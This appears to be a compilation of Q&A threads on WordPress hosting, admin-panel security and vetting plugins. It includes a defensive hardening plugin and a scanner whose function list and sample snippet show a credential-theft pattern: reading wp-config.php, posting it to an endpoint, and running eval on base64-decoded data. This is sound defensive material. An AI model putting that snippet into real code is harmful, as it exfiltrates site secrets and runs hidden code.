Page templates, wordpress, without FTP - php

I am using a .wordpress.com blog that would like to get some custom page templates. I understand how to write page templates, but I don't understand how to get the template onto whatever.wordpress.com without FTP access!
EDIT: I don't want themes, I need to basically make a price form, where users select options, and based on options the price of a product increases, and this price is emailed to the user. I sort of guessed I could use page templates for this, but, I'm open to suggestions.

You are pretty much out of luck for the wordpress.com free feature. For full custom template options, you will need to host your own WordPress site. Or alternatively, choose a good theme and customize the css / etc, as part of its 'premium' feature:
http://en.wordpress.com/products/
EDIT: side notes
Hosting plans are cheap anyway for WordPress blogs these days, LOL. Most major hosts allow it to be pre-installed as you purchase your web space. At less than US$10 per month, it ain't that bad. Probably cheaper than 'premium' with a lot more freedom. (=X unless you already got a really popular blog)
Additionally, the WordPress admin interface itself comes with a built-in theme / file editor (if you host it on your own). That allows you to edit the theme / PHP / css files. Though it may lack syntax highlighting, that can be easily remedied with plug-ins.

Install themeforest theme in wordpress.com (similar question)
You can't install custom templates on a wordpress.com blog, only choose whatever is there.
You need your own hosting to be able to install custom themes.

Related

Is plain wordpress admin panel safe from server-side code execution?

Let's say I want to give someone access to the wordpress admin panel so he can edit posts, settings etc.
My question is: Is admin panel in plain wordpress installation safe so new user won't be able to run any PHP server-side code? He won't be able to install plugins obviously (no ftp access, chmod +r-w and on all wp folders).
He can put as many javascripts into posts as he wants. I know he will be able to hijack my cookies etc., I don't mind. I am asking only about server-side code.
If your WordPress installation is up to date, you are only using plugins from trusted developers, and you have your user roles properly configured for your specific security needs, then yes you can expect WordPress admin to be safe from server side scripting.
Out of the box WordPress ships with user roles that can be modified to your liking. For instance, I'm a super admin of a multisite and can access all sites and network admin, but I don't want my admins to have either. I can set the access level for network admin area, and what sites each admin can access.
This can be further customized to disable things like the theme / plugin editors so you would only be able to manipulate core files from FTP etc. Also, disable the ability to install plugins.
I use a plugin called User Role Editor and Adminimize to control various parts of any role i.e. editor, admin etc. I've also written my own plugin to further customize the user experience.
By default I believe you will find any js or other scripting gets stripped out of the wp editor in pages / posts. You can circumvent this by using a text widget or a plugin I use called HTML Javascript Adder.
Adminimize
User Role Editor
HTML Javascript Adder
To be honest this is not something that can be answered here with a cut and dry answer.
As far as I can remember there is not a location where an admin can edit a file, upload a file or enter PHP to be executed.
This does not mean that there are no ways to execute PHP however. As far as we know at present there are no known security vulnerabilities with the current version of Wordpress however only time will tell if this will remain the same. It might be possible for example to exploit a form and enter PHP that can be executed unintentionally. It may also be possible to edit the URI with PHP code that is not sanitized correctly on the server.
Take a look at this site which will show the numerous vulnerabilities that Wordpress has had in the past.
https://wpvulndb.com/wordpresses
I am sure the Wordpress developers did not knowingly release the software with these bugs but yet it happened.
AFAIK by default you can only do that via the template editor.
Now... if you don't allow any file to be modified, in theory there is no other OOTB functionality that allows arbitrary code execution, so it should be safe, BUT...! It's Wordpress, come on... it has always had security issues, and it will continue to do so because it is full of legacy code and it is poorly designed.
Plus, to be honest, you shouldn't make such safety assumptions even for well engineered software.
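One way to apply the advice in the answers above (disable the theme / plugin editors and the ability to install plugins), shown as an added example that is not part of the original answers. It assumes a self-hosted install; the file name is hypothetical, while the two constants and the capability names are WordPress core's own.

```php
<?php
/**
 * Added example: must-use plugin, e.g. wp-content/mu-plugins/lock-code-paths.php
 * (hypothetical file name). Closes the admin-panel routes to writing PHP.
 */

// Normally set in wp-config.php; defined here only if absent.
if ( ! defined( 'DISALLOW_FILE_EDIT' ) ) {
    define( 'DISALLOW_FILE_EDIT', true ); // removes the theme and plugin file editors
}
if ( ! defined( 'DISALLOW_FILE_MODS' ) ) {
    define( 'DISALLOW_FILE_MODS', true ); // blocks install, update and delete of plugins, themes and core
}

// Second layer: deny the matching capabilities whenever a permission is checked,
// whatever a role editor plugin has granted.
add_filter( 'user_has_cap', function ( $allcaps ) {
    $code_caps = array(
        'edit_themes', 'edit_plugins', 'edit_files',
        'install_plugins', 'install_themes',
        'update_plugins', 'update_themes', 'update_core',
        'delete_plugins', 'delete_themes',
    );
    foreach ( $code_caps as $cap ) {
        $allcaps[ $cap ] = false;
    }
    return $allcaps;
} );
```

The constants are what core itself checks; the filter only guards against a role being reconfigured later. Neither protects against a vulnerability in core or in an installed plugin, which is the caveat the answers above raise.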

Recommended method for quickly creating a dynamic programmable php-mysql blog?

I want to create a blog-like website. At the beginning I'll need a simple one person blog software, but in the future I'd like to have full access to the code and database (control the way posts are organized, offer special forms for creating new posts, allow users to register, implement a rating system, etc.)
What's the best solution for this? Is there a specific tool that will generate a database and php files, to which I'll have access, or should I code everything from zip?
I know Wordpress and Joomla are good blogging tools, but couldn't figure out whether I'll be able to freely redesign a blog that was created using those tools.
Wordpress is an open-source, flexible website infrastructure that is pluggable; and also quite simple to setup without any code modifications. It will generate its own database files and is capable of upgrading itself with minimal administrative overhead.
If you choose at a later date to expand the blog, you can manipulate and customize the theme (100% of what the end-users see), as you see fit.
Wordpress also has a strong plugin repository that may provide extended functionality without any need to code. For example, a post rating plugin already exists that shouldn't require coding to implement;
http://wordpress.org/extend/plugins/rate-this-page-plugin/
Just install wordpress, you'll have full access to the code and database, and it supports writing plugins to extend functionality. You can change page layout with their template engine.
Writing a blog from scratch is not a simple job
Just use Wordpress for now.
There are plenty of plugins to customize Wordpress
You can later develop your own plugins or write a new weblog system and migrate to it.
I promise, once you get familiar with Wordpress, you won't leave it anymore!

How to know if a wordpress plugin is safe

There are thousands of plugins and themes available at wordpress.org and many other third parties. There is every possibility of bad plugins and themes being uploaded, which once uploaded could send info about the site to its owner. It could also send the information in the wp-config.php (A high security risk).
Please tell me how to protect wordpress sites from this other than by reading the code line by line. Also tell me if plugins and themes at wordpress.org are analyzed by the wordpress developers for threats like this before making it available to public.
Thank you.
Peace to All....
As with any code you run on your own server(s), WordPress plugins are caveat emptor.
That said, popular plugins have probably had a fair number of eyes on their code, making it unlikely that they're doing something shady. You probably don't need to go over them with a fine-tooth comb before installing them.
Lesser-known/used plugins, however, should probably be looked over before you install them on a site/server that you care about.
WordPress.org does not review every bit of code that goes into plugins - the only time they even do any review at all is when the plugin is initially submitted to the plugin directory, and that's cursory at best (mostly just to avoid spam). A plugin's code can change drastically after it's initially submitted.
Typically I will look at the feedback the plugin received on wordpress.org. What kind of rating does it have? What comments/questions are asked in the 'what others are saying' section?
After making the decision to install the plugin, BACKUP YOUR DATA PRIOR TO THE ACTUAL INSTALLATION.
This is just good practice in any case, whether it's a wordpress core installation, plugin installation, or theme. If something breaks, you will have something to go back to.
Also making sure to keep frequent backups is a must. If you do get infected, you will want a snapshot.
There is a good article about the safety and security of themes that best plugins for wordpress put together. Also you can go some off of the rating given by the community straight from the wordpress plugin site. If you keep with plugins that have a 4-5 star rating and lots of downloads/ratings, you will most likely be ok. However, because this is an open source project, there is really not a 100% way to keep hackers and "bad people" from putting code in what appears to be a good theme/plugin that you are describing.
In this case if you have concern of a theme or plugin, I would always look over the code very carefully and make sure that it all looks good to you. Of course this is always time consuming and if you are not comfortable with code, this may not be an option. If you have questions about a certain set of plugins/themes, I'm sure if you post them here, there are many people that have used the plugin and maybe the theme before that can help you out.
From "Best Plugins for Wordpress"
1 TAC (Theme Authenticity Checker) Plugin
A very simple and straightforward plugin that will scan all files within your theme to check for any malicious or unwanted code.
2 Theme-Check Plugin
You may notice that a lot of free themes aren’t available directly from WordPress.org; the main reason for this is that most free themes don’t pass the tests that WordPress.org subjects them to. This nifty plugin will provide you with all the testing tools you will need to conduct the same tests that WordPress.org does. It’s also useful for theme developers who want to make sure their theme supports the latest standards.
3 Exploit Scanner Plugin
This plugin isn’t just for themes, it’s for your entire site, so it’s worth keeping once you’ve checked out the theme you’ve decided to use on your site. It scans all files, posts and comments on your site for any possible exploits or anything that looks suspicious, please note however that this plugin will not remove any files.
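A middle ground between trusting ratings and reading every line, shown as an added example that is not part of the original answers and is not code from TAC, Theme-Check or Exploit Scanner: a triage pass with PHP's tokenizer that points a reviewer at the lines worth reading first. The list of flagged functions and the sample input are constructed for illustration.

```php
<?php
// Added example: triage scan of plugin/theme source with PHP's tokenizer.
// A hit is a prompt for manual review, not proof of malice.
const RISKY_CALLS = [ 'base64_decode', 'gzinflate', 'str_rot13', 'create_function', 'assert', 'exec',
    'shell_exec', 'system', 'passthru', 'proc_open', 'popen', 'curl_exec', 'fsockopen', 'wp_remote_post', 'mail' ];

// True when the next non-whitespace token is "(", i.e. the name is being called.
function followed_by_paren( array $tokens, int $i ): bool {
    for ( $j = $i + 1; isset( $tokens[ $j ] ); $j++ ) {
        if ( is_array( $tokens[ $j ] ) && T_WHITESPACE === $tokens[ $j ][0] ) {
            continue;
        }
        return '(' === $tokens[ $j ];
    }
    return false;
}

// Returns a list of [ line number, description ] pairs for one PHP source string.
function scan_php_source( string $code ): array {
    $findings = [];
    $tokens   = token_get_all( $code );
    foreach ( $tokens as $i => $tok ) {
        if ( ! is_array( $tok ) ) {
            continue; // single-character tokens such as ";" carry no name
        }
        list( $id, $text, $line ) = $tok;
        $name = strtolower( ltrim( $text, '\\' ) );
        if ( T_EVAL === $id ) {
            $findings[] = [ $line, 'eval' ];
        } elseif ( in_array( token_name( $id ), [ 'T_STRING', 'T_NAME_FULLY_QUALIFIED' ], true )
            && in_array( $name, RISKY_CALLS, true ) && followed_by_paren( $tokens, $i ) ) {
            $findings[] = [ $line, "call to $name()" ];
        } elseif ( T_CONSTANT_ENCAPSED_STRING === $id && false !== stripos( $text, 'wp-config' ) ) {
            $findings[] = [ $line, 'string mentions wp-config' ];
        }
    }
    return $findings;
}

// Constructed sample, not taken from a real plugin.
$sample = <<<'SAMPLE'
<?php
$cfg = file_get_contents( ABSPATH . 'wp-config.php' );
wp_remote_post( $endpoint, [ 'body' => $cfg ] );
eval( base64_decode( $blob ) );
SAMPLE;

foreach ( scan_php_source( $sample ) as list( $line, $what ) ) {
    echo "sample:$line  $what\n";
}
```

Because it works on tokens rather than raw text, names inside comments do not trigger it; names assembled at run time from string fragments will not be caught, so a clean result does not replace review of a little-used plugin.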

Using Wordpress as a CMS - advice on doing it for localhost?

I have a plain-vanilla install of Wordpress on localhost, virtual host in Apache set to:
127.0.0.1 myradiostationhere.com
127.0.0.1 www.myradioanytown.co.uk
and the virtual host works.
However, I don't want to use it as a blog, but as a CMS like here:
http://www.brmb.co.uk/
and
http://www.brmb.co.uk/schedule/
(basically, any pages on that site are database-driven Wordpress pages, not blogs).
I'm not asking how to create pages etc. - I understand that - but rather if anyone knows of the best way to do this.
I'm trying to emulate their look, but with similar CSS stylesheets, as per:
Fair dealing in a work for the purposes of private study or research (s. 29)
under Copyright, Design and Patents Act 1988 (that's the legal bit out the way).
Would I need to edit the PHP files in order to get this to work in the way I intend to?
Anyone here had experience of custom Wordpress CMS design/installs, and how would you recommend I go about this?
(note: This isn't for a live radio station site, it's a development/testing site on localhost!)
You basically want to create WordPress theme.
You will need a bit of PHP editing, but mostly of the copy-and-paste variety (to get you started).
Another option is to download a similar free theme or even buy one.

WordPress Plugin Question

Is it possible to use plugins on my blog for WordPress.com? There are some very nice tutorials on how to do this if I have WordPress installed on my own server, but I am using wordpress.com.
Does anyone know if they allow this? It seems like the expected "Plugin" category on my dashboard is missing.
Many thanks,
brett
It already has some plugins built in such as Akismet, but you can not add your own on Wordpress.com (you can't even add other themes and can only use the ones they provide).
Here is a list of the free features. With premium paid for features, you also have the ability to use your own domain name and can customize your CSS (as well as some other stuff).
Wordpress.com doesn't let you install your own plugins.
